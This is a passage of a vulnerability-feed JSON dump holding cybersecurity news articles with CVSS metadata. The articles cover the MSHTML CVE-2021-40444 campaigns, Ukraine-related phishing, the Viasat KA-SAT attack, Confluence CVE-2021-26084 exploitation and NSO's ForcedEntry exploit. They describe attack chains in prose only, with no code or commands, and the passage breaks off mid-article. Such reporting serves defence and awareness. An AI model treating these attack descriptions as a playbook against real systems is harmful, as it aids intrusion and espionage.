"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[![Ukraine CyberAttacks](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e1000/flag.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[![Ukraine CyberAttacks](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e1000/phishing.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ)](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob)](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc)](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[![Atlassian Confluence](https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-15T07:42:46", "description": "Apple users should immediately update all their devices \u2013 iPhones, iPads, Macs and Apple Watches \u2013 to install an emergency patch for a zero-click zero-day exploited by NSO Group to install spyware.\n\nThe [security updates](<https://support.apple.com/en-us/HT201222>), pushed out by Apple on Monday, include [iOS 14.8](<https://support.apple.com/en-us/HT212807>) for iPhones and iPads, as well as new updates for Apple Watch and macOS. The patches will fix at least one vulnerability that the tech behemoth said \u201cmay have been actively exploited.\u201d\n\nCitizen Lab first [discovered](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) the never-before-seen, zero-click exploit, which it detected targeting iMessaging, last month. It\u2019s allegedly been used to illegally spy on Bahraini activists with NSO Group\u2019s Pegasus spyware, according to the cybersecurity watchdog.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe digital researchers dubbed the new iMessaging exploit ForcedEntry.\n\nCitizen Group said in August that they had identified nine Bahraini activists whose iPhones were inflicted with Pegasus spyware between June 2020 and February 2021. Some of the activists\u2019 phones suffered zero-click iMessage attacks that, besides ForcedEntry, also included [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>).\n\nThe activists included three members of [Waad](<https://www.aldemokrati.org/>) (a secular Bahraini political society), three members of the [Bahrain Center for Human Rights](<https://bahrainrights.net/>), two exiled Bahraini dissidents, and one member of [Al Wefaq](<https://en.wikipedia.org/wiki/Al_Wefaq>) (a Shiite Bahraini political society), Citizen Lab wrote.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\nCitizen Lab first observed NSO Group deploying ForcedEntry in February 2021. Apple had just [introduced BlastDoor](<https://threatpost.com/apple-ios-imessage-blastdoor/163479/>), a structural improvement in iOS 14 meant to block message-based, zero-click exploits like these NSO Group-associated attacks \u2013 the month before. BlastDoor was supposed to prevent this type of Pegasus attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df [called](<https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html>) a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages.\n\nIn a [post](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) on Monday, Citizen Lab researchers said that in March 2021, they had examined the phone of a Saudi activist who requested anonymity and determined that the phone had been infected with NSO Group\u2019s Pegasus spyware. Last Tuesday, Sept. 7, Citizen Lab forwarded artifacts from two types of crashes on another phone that had been infected with Pegasus, suspecting that both infections showed parts of the ForcedEntry exploit chain.\n\nCitizen Lab forwarded the artifacts to Apple on Tuesday, Sept. 7. On Monday, Sept. 13, Apple confirmed that the files included a zero-day exploit against iOS and MacOS. Apple has designated the ForcedEntry exploit CVE-2021-30860: an as-yet-unrated flaw that Apple describes as \u201cprocessing a maliciously crafted PDF may lead to arbitrary code execution.\u201d\n\n## Sniffing out NSO Group\u2019s Tracks\n\nCitizen Lab described several distinct elements that gives researchers high confidence that the exploit can be tied to the secretive Israeli spyware maker [NSO Group](<https://threatpost.com/nso-group-data-pegasus/167897/>), including a forensic artifact called CascadeFail.\n\nCascadeFail is a bug whereby \u201cevidence is incompletely deleted from the phone\u2019s DataUsage.sqlite file,\u201d according to Citizen Lab. In CascadeFail, \u201can entry from the file\u2019s ZPROCESS table is deleted, but not entries in the ZLIVEUSAGE table that refer to the deleted ZPROCESS entry,\u201d they described.\n\nThat has NSO Group\u2019s fingerprints, they said: \u201cWe have only ever seen this type of incomplete deletion associated with NSO Group\u2019s Pegasus spyware, and we believe that the bug is distinctive enough to point back to NSO.\u201d\n\nAnother telltale sign: multiple process names installed by the ForcedEntry exploit, including the name \u201csetframed\u201d. That process name was used in an attack with NSO Group\u2019s Pegasus spyware on an [Al Jazeera journalist](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>) in July 2020, according to Citizen Lab: a detail that the watchdog didn\u2019t reveal at the time.\n\nZero click remote exploits such as the novel method used by Pegasus spyware to invisibly infect an Apple device without the victim\u2019s knowledge or the need for the victim to click on anything at all were used to infect one victim for as long as six months. They\u2019re pure gold to governments, mercenaries and criminals who want to secretly surveil targets\u2019 devices without being detected.\n\nPegasus is a powerful spyware: it can turn on a target\u2019s camera and microphone so as to record messages, texts, emails, and calls, even if they\u2019re sent via encrypted messaging apps such as [Signal](<https://threatpost.com/google-research-pinpoints-security-soft-spot-in-multiple-chat-platforms/163175/>).\n\n## Pegasus\u2019s Threadbare Narrative\n\nNSO has long maintained that it only sells its spyware to a handful of intelligence communities within countries that have been thoroughly vetted for human rights violations. The company has repeatedly tried to keep up that 